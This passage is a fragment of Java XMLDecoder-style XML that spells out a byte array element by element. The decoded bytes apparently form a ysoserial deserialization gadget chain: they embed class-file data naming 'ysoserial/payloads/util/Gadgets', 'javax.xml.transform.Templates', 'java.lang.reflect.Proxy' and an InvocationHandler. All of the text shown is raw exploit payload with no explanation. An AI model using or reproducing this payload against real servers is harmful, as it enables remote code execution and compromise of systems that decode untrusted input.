index=\"4003\"><byte>-82</byte></void><void index=\"4004\"><byte>-74</byte></void><void index=\"4005\"><byte>0</byte></void><void index=\"4006\"><byte>-77</byte></void><void index=\"4007\"><byte>25</byte></void><void index=\"4008\"><byte>10</byte></void><void index=\"4009\"><byte>-74</byte></void><void index=\"4010\"><byte>0</byte></void><void index=\"4011\"><byte>-74</byte></void><void index=\"4012\"><byte>-89</byte></void><void index=\"4013\"><byte>0</byte></void><void index=\"4014\"><byte>3</byte></void><void index=\"4015\"><byte>-79</byte></void><void index=\"4016\"><byte>0</byte></void><void index=\"4017\"><byte>1</byte></void><void index=\"4018\"><byte>0</byte></void><void index=\"4019\"><byte>94</byte></void><void index=\"4020\"><byte>0</byte></void><void index=\"4021\"><byte>-7</byte></void><void index=\"4022\"><byte>0</byte></void><void index=\"4023\"><byte>-4</byte></void><void index=\"4024\"><byte>0</byte></void><void index=\"4025\"><byte>-89</byte></void><void index=\"4026\"><byte>0</byte></void><void index=\"4027\"><byte>1</byte></void><void index=\"4028\"><byte>0</byte></void><void index=\"4029\"><byte>-73</byte></void><void index=\"4030\"><byte>0</byte></void><void index=\"4031\"><byte>0</byte></void><void index=\"4032\"><byte>0</byte></void><void index=\"4033\"><byte>70</byte></void><void index=\"4034\"><byte>0</byte></void><void index=\"4035\"><byte>9</byte></void><void index=\"4036\"><byte>3</byte></void><void index=\"4037\"><byte>-1</byte></void><void index=\"4038\"><byte>0</byte></void><void index=\"4039\"><byte>109</byte></void><void index=\"4040\"><byte>0</byte></void><void index=\"4041\"><byte>6</byte></void><void index=\"4042\"><byte>0</byte></void><void index=\"4043\"><byte>5</byte></void><void index=\"4044\"><byte>7</byte></void><void index=\"4045\"><byte>0</byte></void><void index=\"4046\"><byte>112</byte></void><void index=\"4047\"><byte>7</byte></void><void index=\"4048\"><byte>0</byte></void><void index=\"4049\"><byte>69</byte></void><void index=\"4050\"><byte>7</byte></void><void index=\"4051\"><byte>0</byte></void><void index=\"4052\"><byte>96</byte></void><void index=\"4053\"><byte>7</byte></void><void index=\"4054\"><byte>0</byte></void><void index=\"4055\"><byte>112</byte></void><void index=\"4056\"><byte>0</byte></void><void index=\"4057\"><byte>0</byte></void><void index=\"4058\"><byte>2</byte></void><void index=\"4059\"><byte>29</byte></void><void index=\"4060\"><byte>-4</byte></void><void index=\"4061\"><byte>0</byte></void><void index=\"4062\"><byte>26</byte></void><void index=\"4063\"><byte>7</byte></void><void index=\"4064\"><byte>0</byte></void><void index=\"4065\"><byte>-115</byte></void><void index=\"4066\"><byte>-2</byte></void><void index=\"4067\"><byte>0</byte></void><void index=\"4068\"><byte>32</byte></void><void index=\"4069\"><byte>7</byte></void><void index=\"4070\"><byte>0</byte></void><void index=\"4071\"><byte>-119</byte></void><void index=\"4072\"><byte>7</byte></void><void index=\"4073\"><byte>0</byte></void><void index=\"4074\"><byte>112</byte></void><void index=\"4075\"><byte>7</byte></void><void index=\"4076\"><byte>0</byte></void><void index=\"4077\"><byte>112</byte></void><void index=\"4078\"><byte>21</byte></void><void index=\"4079\"><byte>-1</byte></void><void index=\"4080\"><byte>0</byte></void><void index=\"4081\"><byte>23</byte></void><void index=\"4082\"><byte>0</byte></void><void index=\"4083\"><byte>6</byte></void><void index=\"4084\"><byte>0</byte></void><void index=\"4085\"><byte>5</byte></void><void index=\"4086\"><byte>7</byte></void><void index=\"4087\"><byte>0</byte></void><void index=\"4088\"><byte>112</byte></void><void index=\"4089\"><byte>7</byte></void><void index=\"4090\"><byte>0</byte></void><void index=\"4091\"><byte>69</byte></void><void index=\"4092\"><byte>7</byte></void><void index=\"4093\"><byte>0</byte></void><void index=\"4094\"><byte>96</byte></void><void index=\"4095\"><byte>7</byte></void><void index=\"4096\"><byte>0</byte></void><void index=\"4097\"><byte>112</byte></void><void index=\"4098\"><byte>0</byte></void><void index=\"4099\"><byte>1</byte></void><void index=\"4100\"><byte>7</byte></void><void index=\"4101\"><byte>0</byte></void><void index=\"4102\"><byte>-89</byte></void><void index=\"4103\"><byte>20</byte></void><void index=\"4104\"><byte>0</byte></void><void index=\"4105\"><byte>2</byte></void><void index=\"4106\"><byte>0</byte></void><void index=\"4107\"><byte>32</byte></void><void index=\"4108\"><byte>0</byte></void><void index=\"4109\"><byte>0</byte></void><void index=\"4110\"><byte>0</byte></void><void index=\"4111\"><byte>2</byte></void><void index=\"4112\"><byte>0</byte></void><void index=\"4113\"><byte>33</byte></void><void index=\"4114\"><byte>0</byte></void><void index=\"4115\"><byte>17</byte></void><void index=\"4116\"><byte>0</byte></void><void index=\"4117\"><byte>0</byte></void><void index=\"4118\"><byte>0</byte></void><void index=\"4119\"><byte>10</byte></void><void index=\"4120\"><byte>0</byte></void><void index=\"4121\"><byte>1</byte></void><void index=\"4122\"><byte>0</byte></void><void index=\"4123\"><byte>2</byte></void><void index=\"4124\"><byte>0</byte></void><void index=\"4125\"><byte>35</byte></void><void index=\"4126\"><byte>0</byte></void><void index=\"4127\"><byte>16</byte></void><void index=\"4128\"><byte>0</byte></void><void index=\"4129\"><byte>9</byte></void><void index=\"4130\"><byte>117</byte></void><void index=\"4131\"><byte>113</byte></void><void index=\"4132\"><byte>0</byte></void><void index=\"4133\"><byte>126</byte></void><void index=\"4134\"><byte>0</byte></void><void index=\"4135\"><byte>13</byte></void><void index=\"4136\"><byte>0</byte></void><void index=\"4137\"><byte>0</byte></void><void index=\"4138\"><byte>1</byte></void><void index=\"4139\"><byte>-44</byte></void><void index=\"4140\"><byte>-54</byte></void><void index=\"4141\"><byte>-2</byte></void><void index=\"4142\"><byte>-70</byte></void><void index=\"4143\"><byte>-66</byte></void><void index=\"4144\"><byte>0</byte></void><void index=\"4145\"><byte>0</byte></void><void index=\"4146\"><byte>0</byte></void><void index=\"4147\"><byte>50</byte></void><void index=\"4148\"><byte>0</byte></void><void index=\"4149\"><byte>27</byte></void><void index=\"4150\"><byte>10</byte></void><void index=\"4151\"><byte>0</byte></void><void index=\"4152\"><byte>3</byte></void><void index=\"4153\"><byte>0</byte></void><void index=\"4154\"><byte>21</byte></void><void index=\"4155\"><byte>7</byte></void><void index=\"4156\"><byte>0</byte></void><void index=\"4157\"><byte>23</byte></void><void index=\"4158\"><byte>7</byte></void><void index=\"4159\"><byte>0</byte></void><void index=\"4160\"><byte>24</byte></void><void index=\"4161\"><byte>7</byte></void><void index=\"4162\"><byte>0</byte></void><void index=\"4163\"><byte>25</byte></void><void index=\"4164\"><byte>1</byte></void><void index=\"4165\"><byte>0</byte></void><void index=\"4166\"><byte>16</byte></void><void index=\"4167\"><byte>115</byte></void><void index=\"4168\"><byte>101</byte></void><void index=\"4169\"><byte>114</byte></void><void index=\"4170\"><byte>105</byte></void><void index=\"4171\"><byte>97</byte></void><void index=\"4172\"><byte>108</byte></void><void index=\"4173\"><byte>86</byte></void><void index=\"4174\"><byte>101</byte></void><void index=\"4175\"><byte>114</byte></void><void index=\"4176\"><byte>115</byte></void><void index=\"4177\"><byte>105</byte></void><void index=\"4178\"><byte>111</byte></void><void index=\"4179\"><byte>110</byte></void><void index=\"4180\"><byte>85</byte></void><void index=\"4181\"><byte>73</byte></void><void index=\"4182\"><byte>68</byte></void><void index=\"4183\"><byte>1</byte></void><void index=\"4184\"><byte>0</byte></void><void index=\"4185\"><byte>1</byte></void><void index=\"4186\"><byte>74</byte></void><void index=\"4187\"><byte>1</byte></void><void index=\"4188\"><byte>0</byte></void><void index=\"4189\"><byte>13</byte></void><void index=\"4190\"><byte>67</byte></void><void index=\"4191\"><byte>111</byte></void><void index=\"4192\"><byte>110</byte></void><void index=\"4193\"><byte>115</byte></void><void index=\"4194\"><byte>116</byte></void><void index=\"4195\"><byte>97</byte></void><void index=\"4196\"><byte>110</byte></void><void index=\"4197\"><byte>116</byte></void><void index=\"4198\"><byte>86</byte></void><void index=\"4199\"><byte>97</byte></void><void index=\"4200\"><byte>108</byte></void><void index=\"4201\"><byte>117</byte></void><void index=\"4202\"><byte>101</byte></void><void index=\"4203\"><byte>5</byte></void><void index=\"4204\"><byte>113</byte></void><void index=\"4205\"><byte>-26</byte></void><void index=\"4206\"><byte>105</byte></void><void index=\"4207\"><byte>-18</byte></void><void index=\"4208\"><byte>60</byte></void><void index=\"4209\"><byte>109</byte></void><void index=\"4210\"><byte>71</byte></void><void index=\"4211\"><byte>24</byte></void><void index=\"4212\"><byte>1</byte></void><void index=\"4213\"><byte>0</byte></void><void index=\"4214\"><byte>6</byte></void><void index=\"4215\"><byte>60</byte></void><void index=\"4216\"><byte>105</byte></void><void index=\"4217\"><byte>110</byte></void><void index=\"4218\"><byte>105</byte></void><void index=\"4219\"><byte>116</byte></void><void index=\"4220\"><byte>62</byte></void><void index=\"4221\"><byte>1</byte></void><void index=\"4222\"><byte>0</byte></void><void index=\"4223\"><byte>3</byte></void><void index=\"4224\"><byte>40</byte></void><void index=\"4225\"><byte>41</byte></void><void index=\"4226\"><byte>86</byte></void><void index=\"4227\"><byte>1</byte></void><void index=\"4228\"><byte>0</byte></void><void index=\"4229\"><byte>4</byte></void><void index=\"4230\"><byte>67</byte></void><void index=\"4231\"><byte>111</byte></void><void index=\"4232\"><byte>100</byte></void><void index=\"4233\"><byte>101</byte></void><void index=\"4234\"><byte>1</byte></void><void index=\"4235\"><byte>0</byte></void><void index=\"4236\"><byte>15</byte></void><void index=\"4237\"><byte>76</byte></void><void index=\"4238\"><byte>105</byte></void><void index=\"4239\"><byte>110</byte></void><void index=\"4240\"><byte>101</byte></void><void index=\"4241\"><byte>78</byte></void><void index=\"4242\"><byte>117</byte></void><void index=\"4243\"><byte>109</byte></void><void index=\"4244\"><byte>98</byte></void><void index=\"4245\"><byte>101</byte></void><void index=\"4246\"><byte>114</byte></void><void index=\"4247\"><byte>84</byte></void><void index=\"4248\"><byte>97</byte></void><void index=\"4249\"><byte>98</byte></void><void index=\"4250\"><byte>108</byte></void><void index=\"4251\"><byte>101</byte></void><void index=\"4252\"><byte>1</byte></void><void index=\"4253\"><byte>0</byte></void><void index=\"4254\"><byte>18</byte></void><void index=\"4255\"><byte>76</byte></void><void index=\"4256\"><byte>111</byte></void><void index=\"4257\"><byte>99</byte></void><void index=\"4258\"><byte>97</byte></void><void index=\"4259\"><byte>108</byte></void><void index=\"4260\"><byte>86</byte></void><void index=\"4261\"><byte>97</byte></void><void index=\"4262\"><byte>114</byte></void><void index=\"4263\"><byte>105</byte></void><void index=\"4264\"><byte>97</byte></void><void index=\"4265\"><byte>98</byte></void><void index=\"4266\"><byte>108</byte></void><void index=\"4267\"><byte>101</byte></void><void index=\"4268\"><byte>84</byte></void><void index=\"4269\"><byte>97</byte></void><void index=\"4270\"><byte>98</byte></void><void index=\"4271\"><byte>108</byte></void><void index=\"4272\"><byte>101</byte></void><void index=\"4273\"><byte>1</byte></void><void index=\"4274\"><byte>0</byte></void><void index=\"4275\"><byte>4</byte></void><void index=\"4276\"><byte>116</byte></void><void index=\"4277\"><byte>104</byte></void><void index=\"4278\"><byte>105</byte></void><void index=\"4279\"><byte>115</byte></void><void index=\"4280\"><byte>1</byte></void><void index=\"4281\"><byte>0</byte></void><void index=\"4282\"><byte>3</byte></void><void index=\"4283\"><byte>70</byte></void><void index=\"4284\"><byte>111</byte></void><void index=\"4285\"><byte>111</byte></void><void index=\"4286\"><byte>1</byte></void><void index=\"4287\"><byte>0</byte></void><void index=\"4288\"><byte>12</byte></void><void index=\"4289\"><byte>73</byte></void><void index=\"4290\"><byte>110</byte></void><void index=\"4291\"><byte>110</byte></void><void index=\"4292\"><byte>101</byte></void><void index=\"4293\"><byte>114</byte></void><void index=\"4294\"><byte>67</byte></void><void index=\"4295\"><byte>108</byte></void><void index=\"4296\"><byte>97</byte></void><void index=\"4297\"><byte>115</byte></void><void index=\"4298\"><byte>115</byte></void><void index=\"4299\"><byte>101</byte></void><void index=\"4300\"><byte>115</byte></void><void index=\"4301\"><byte>1</byte></void><void index=\"4302\"><byte>0</byte></void><void index=\"4303\"><byte>37</byte></void><void index=\"4304\"><byte>76</byte></void><void index=\"4305\"><byte>121</byte></void><void index=\"4306\"><byte>115</byte></void><void index=\"4307\"><byte>111</byte></void><void index=\"4308\"><byte>115</byte></void><void index=\"4309\"><byte>101</byte></void><void index=\"4310\"><byte>114</byte></void><void index=\"4311\"><byte>105</byte></void><void index=\"4312\"><byte>97</byte></void><void index=\"4313\"><byte>108</byte></void><void index=\"4314\"><byte>47</byte></void><void index=\"4315\"><byte>112</byte></void><void index=\"4316\"><byte>97</byte></void><void index=\"4317\"><byte>121</byte></void><void index=\"4318\"><byte>108</byte></void><void index=\"4319\"><byte>111</byte></void><void index=\"4320\"><byte>97</byte></void><void index=\"4321\"><byte>100</byte></void><void index=\"4322\"><byte>115</byte></void><void index=\"4323\"><byte>47</byte></void><void index=\"4324\"><byte>117</byte></void><void index=\"4325\"><byte>116</byte></void><void index=\"4326\"><byte>105</byte></void><void index=\"4327\"><byte>108</byte></void><void index=\"4328\"><byte>47</byte></void><void index=\"4329\"><byte>71</byte></void><void index=\"4330\"><byte>97</byte></void><void index=\"4331\"><byte>100</byte></void><void index=\"4332\"><byte>103</byte></void><void index=\"4333\"><byte>101</byte></void><void index=\"4334\"><byte>116</byte></void><void index=\"4335\"><byte>115</byte></void><void index=\"4336\"><byte>36</byte></void><void index=\"4337\"><byte>70</byte></void><void index=\"4338\"><byte>111</byte></void><void index=\"4339\"><byte>111</byte></void><void index=\"4340\"><byte>59</byte></void><void index=\"4341\"><byte>1</byte></void><void index=\"4342\"><byte>0</byte></void><void index=\"4343\"><byte>10</byte></void><void index=\"4344\"><byte>83</byte></void><void index=\"4345\"><byte>111</byte></void><void index=\"4346\"><byte>117</byte></void><void index=\"4347\"><byte>114</byte></void><void index=\"4348\"><byte>99</byte></void><void index=\"4349\"><byte>101</byte></void><void index=\"4350\"><byte>70</byte></void><void index=\"4351\"><byte>105</byte></void><void index=\"4352\"><byte>108</byte></void><void index=\"4353\"><byte>101</byte></void><void index=\"4354\"><byte>1</byte></void><void index=\"4355\"><byte>0</byte></void><void index=\"4356\"><byte>12</byte></void><void index=\"4357\"><byte>71</byte></void><void index=\"4358\"><byte>97</byte></void><void index=\"4359\"><byte>100</byte></void><void index=\"4360\"><byte>103</byte></void><void index=\"4361\"><byte>101</byte></void><void index=\"4362\"><byte>116</byte></void><void index=\"4363\"><byte>115</byte></void><void index=\"4364\"><byte>46</byte></void><void index=\"4365\"><byte>106</byte></void><void index=\"4366\"><byte>97</byte></void><void index=\"4367\"><byte>118</byte></void><void index=\"4368\"><byte>97</byte></void><void index=\"4369\"><byte>12</byte></void><void index=\"4370\"><byte>0</byte></void><void index=\"4371\"><byte>10</byte></void><void index=\"4372\"><byte>0</byte></void><void index=\"4373\"><byte>11</byte></void><void index=\"4374\"><byte>7</byte></void><void index=\"4375\"><byte>0</byte></void><void index=\"4376\"><byte>26</byte></void><void index=\"4377\"><byte>1</byte></void><void index=\"4378\"><byte>0</byte></void><void index=\"4379\"><byte>35</byte></void><void index=\"4380\"><byte>121</byte></void><void index=\"4381\"><byte>115</byte></void><void index=\"4382\"><byte>111</byte></void><void index=\"4383\"><byte>115</byte></void><void index=\"4384\"><byte>101</byte></void><void index=\"4385\"><byte>114</byte></void><void index=\"4386\"><byte>105</byte></void><void index=\"4387\"><byte>97</byte></void><void index=\"4388\"><byte>108</byte></void><void index=\"4389\"><byte>47</byte></void><void index=\"4390\"><byte>112</byte></void><void index=\"4391\"><byte>97</byte></void><void index=\"4392\"><byte>121</byte></void><void index=\"4393\"><byte>108</byte></void><void index=\"4394\"><byte>111</byte></void><void index=\"4395\"><byte>97</byte></void><void index=\"4396\"><byte>100</byte></void><void index=\"4397\"><byte>115</byte></void><void index=\"4398\"><byte>47</byte></void><void index=\"4399\"><byte>117</byte></void><void index=\"4400\"><byte>116</byte></void><void index=\"4401\"><byte>105</byte></void><void index=\"4402\"><byte>108</byte></void><void index=\"4403\"><byte>47</byte></void><void index=\"4404\"><byte>71</byte></void><void index=\"4405\"><byte>97</byte></void><void index=\"4406\"><byte>100</byte></void><void index=\"4407\"><byte>103</byte></void><void index=\"4408\"><byte>101</byte></void><void index=\"4409\"><byte>116</byte></void><void index=\"4410\"><byte>115</byte></void><void index=\"4411\"><byte>36</byte></void><void index=\"4412\"><byte>70</byte></void><void index=\"4413\"><byte>111</byte></void><void index=\"4414\"><byte>111</byte></void><void index=\"4415\"><byte>1</byte></void><void index=\"4416\"><byte>0</byte></void><void index=\"4417\"><byte>16</byte></void><void index=\"4418\"><byte>106</byte></void><void index=\"4419\"><byte>97</byte></void><void index=\"4420\"><byte>118</byte></void><void index=\"4421\"><byte>97</byte></void><void index=\"4422\"><byte>47</byte></void><void index=\"4423\"><byte>108</byte></void><void index=\"4424\"><byte>97</byte></void><void index=\"4425\"><byte>110</byte></void><void index=\"4426\"><byte>103</byte></void><void index=\"4427\"><byte>47</byte></void><void index=\"4428\"><byte>79</byte></void><void index=\"4429\"><byte>98</byte></void><void index=\"4430\"><byte>106</byte></void><void index=\"4431\"><byte>101</byte></void><void index=\"4432\"><byte>99</byte></void><void index=\"4433\"><byte>116</byte></void><void index=\"4434\"><byte>1</byte></void><void index=\"4435\"><byte>0</byte></void><void index=\"4436\"><byte>20</byte></void><void index=\"4437\"><byte>106</byte></void><void index=\"4438\"><byte>97</byte></void><void index=\"4439\"><byte>118</byte></void><void index=\"4440\"><byte>97</byte></void><void index=\"4441\"><byte>47</byte></void><void index=\"4442\"><byte>105</byte></void><void index=\"4443\"><byte>111</byte></void><void index=\"4444\"><byte>47</byte></void><void index=\"4445\"><byte>83</byte></void><void index=\"4446\"><byte>101</byte></void><void index=\"4447\"><byte>114</byte></void><void index=\"4448\"><byte>105</byte></void><void index=\"4449\"><byte>97</byte></void><void index=\"4450\"><byte>108</byte></void><void index=\"4451\"><byte>105</byte></void><void index=\"4452\"><byte>122</byte></void><void index=\"4453\"><byte>97</byte></void><void index=\"4454\"><byte>98</byte></void><void index=\"4455\"><byte>108</byte></void><void index=\"4456\"><byte>101</byte></void><void index=\"4457\"><byte>1</byte></void><void index=\"4458\"><byte>0</byte></void><void index=\"4459\"><byte>31</byte></void><void index=\"4460\"><byte>121</byte></void><void index=\"4461\"><byte>115</byte></void><void index=\"4462\"><byte>111</byte></void><void index=\"4463\"><byte>115</byte></void><void index=\"4464\"><byte>101</byte></void><void index=\"4465\"><byte>114</byte></void><void index=\"4466\"><byte>105</byte></void><void index=\"4467\"><byte>97</byte></void><void index=\"4468\"><byte>108</byte></void><void index=\"4469\"><byte>47</byte></void><void index=\"4470\"><byte>112</byte></void><void index=\"4471\"><byte>97</byte></void><void index=\"4472\"><byte>121</byte></void><void index=\"4473\"><byte>108</byte></void><void index=\"4474\"><byte>111</byte></void><void index=\"4475\"><byte>97</byte></void><void index=\"4476\"><byte>100</byte></void><void index=\"4477\"><byte>115</byte></void><void index=\"4478\"><byte>47</byte></void><void index=\"4479\"><byte>117</byte></void><void index=\"4480\"><byte>116</byte></void><void index=\"4481\"><byte>105</byte></void><void index=\"4482\"><byte>108</byte></void><void index=\"4483\"><byte>47</byte></void><void index=\"4484\"><byte>71</byte></void><void index=\"4485\"><byte>97</byte></void><void index=\"4486\"><byte>100</byte></void><void index=\"4487\"><byte>103</byte></void><void index=\"4488\"><byte>101</byte></void><void index=\"4489\"><byte>116</byte></void><void index=\"4490\"><byte>115</byte></void><void index=\"4491\"><byte>0</byte></void><void index=\"4492\"><byte>33</byte></void><void index=\"4493\"><byte>0</byte></void><void index=\"4494\"><byte>2</byte></void><void index=\"4495\"><byte>0</byte></void><void index=\"4496\"><byte>3</byte></void><void index=\"4497\"><byte>0</byte></void><void index=\"4498\"><byte>1</byte></void><void index=\"4499\"><byte>0</byte></void><void index=\"4500\"><byte>4</byte></void><void index=\"4501\"><byte>0</byte></void><void index=\"4502\"><byte>1</byte></void><void index=\"4503\"><byte>0</byte></void><void index=\"4504\"><byte>26</byte></void><void index=\"4505\"><byte>0</byte></void><void index=\"4506\"><byte>5</byte></void><void index=\"4507\"><byte>0</byte></void><void index=\"4508\"><byte>6</byte></void><void index=\"4509\"><byte>0</byte></void><void index=\"4510\"><byte>1</byte></void><void index=\"4511\"><byte>0</byte></void><void index=\"4512\"><byte>7</byte></void><void index=\"4513\"><byte>0</byte></void><void index=\"4514\"><byte>0</byte></void><void index=\"4515\"><byte>0</byte></void><void index=\"4516\"><byte>2</byte></void><void index=\"4517\"><byte>0</byte></void><void index=\"4518\"><byte>8</byte></void><void index=\"4519\"><byte>0</byte></void><void index=\"4520\"><byte>1</byte></void><void index=\"4521\"><byte>0</byte></void><void index=\"4522\"><byte>1</byte></void><void index=\"4523\"><byte>0</byte></void><void index=\"4524\"><byte>10</byte></void><void index=\"4525\"><byte>0</byte></void><void index=\"4526\"><byte>11</byte></void><void index=\"4527\"><byte>0</byte></void><void index=\"4528\"><byte>1</byte></void><void index=\"4529\"><byte>0</byte></void><void index=\"4530\"><byte>12</byte></void><void index=\"4531\"><byte>0</byte></void><void index=\"4532\"><byte>0</byte></void><void index=\"4533\"><byte>0</byte></void><void index=\"4534\"><byte>47</byte></void><void index=\"4535\"><byte>0</byte></void><void index=\"4536\"><byte>1</byte></void><void index=\"4537\"><byte>0</byte></void><void index=\"4538\"><byte>1</byte></void><void index=\"4539\"><byte>0</byte></void><void index=\"4540\"><byte>0</byte></void><void index=\"4541\"><byte>0</byte></void><void index=\"4542\"><byte>5</byte></void><void index=\"4543\"><byte>42</byte></void><void index=\"4544\"><byte>-73</byte></void><void index=\"4545\"><byte>0</byte></void><void index=\"4546\"><byte>1</byte></void><void index=\"4547\"><byte>-79</byte></void><void index=\"4548\"><byte>0</byte></void><void index=\"4549\"><byte>0</byte></void><void index=\"4550\"><byte>0</byte></void><void index=\"4551\"><byte>2</byte></void><void index=\"4552\"><byte>0</byte></void><void index=\"4553\"><byte>13</byte></void><void index=\"4554\"><byte>0</byte></void><void index=\"4555\"><byte>0</byte></void><void index=\"4556\"><byte>0</byte></void><void index=\"4557\"><byte>6</byte></void><void index=\"4558\"><byte>0</byte></void><void index=\"4559\"><byte>1</byte></void><void index=\"4560\"><byte>0</byte></void><void index=\"4561\"><byte>0</byte></void><void index=\"4562\"><byte>0</byte></void><void index=\"4563\"><byte>60</byte></void><void index=\"4564\"><byte>0</byte></void><void index=\"4565\"><byte>14</byte></void><void index=\"4566\"><byte>0</byte></void><void index=\"4567\"><byte>0</byte></void><void index=\"4568\"><byte>0</byte></void><void index=\"4569\"><byte>12</byte></void><void index=\"4570\"><byte>0</byte></void><void index=\"4571\"><byte>1</byte></void><void index=\"4572\"><byte>0</byte></void><void index=\"4573\"><byte>0</byte></void><void index=\"4574\"><byte>0</byte></void><void index=\"4575\"><byte>5</byte></void><void index=\"4576\"><byte>0</byte></void><void index=\"4577\"><byte>15</byte></void><void index=\"4578\"><byte>0</byte></void><void index=\"4579\"><byte>18</byte></void><void index=\"4580\"><byte>0</byte></void><void index=\"4581\"><byte>0</byte></void><void index=\"4582\"><byte>0</byte></void><void index=\"4583\"><byte>2</byte></void><void index=\"4584\"><byte>0</byte></void><void index=\"4585\"><byte>19</byte></void><void index=\"4586\"><byte>0</byte></void><void index=\"4587\"><byte>0</byte></void><void index=\"4588\"><byte>0</byte></void><void index=\"4589\"><byte>2</byte></void><void index=\"4590\"><byte>0</byte></void><void index=\"4591\"><byte>20</byte></void><void index=\"4592\"><byte>0</byte></void><void index=\"4593\"><byte>17</byte></void><void index=\"4594\"><byte>0</byte></void><void index=\"4595\"><byte>0</byte></void><void index=\"4596\"><byte>0</byte></void><void index=\"4597\"><byte>10</byte></void><void index=\"4598\"><byte>0</byte></void><void index=\"4599\"><byte>1</byte></void><void index=\"4600\"><byte>0</byte></void><void index=\"4601\"><byte>2</byte></void><void index=\"4602\"><byte>0</byte></void><void index=\"4603\"><byte>22</byte></void><void index=\"4604\"><byte>0</byte></void><void index=\"4605\"><byte>16</byte></void><void index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void 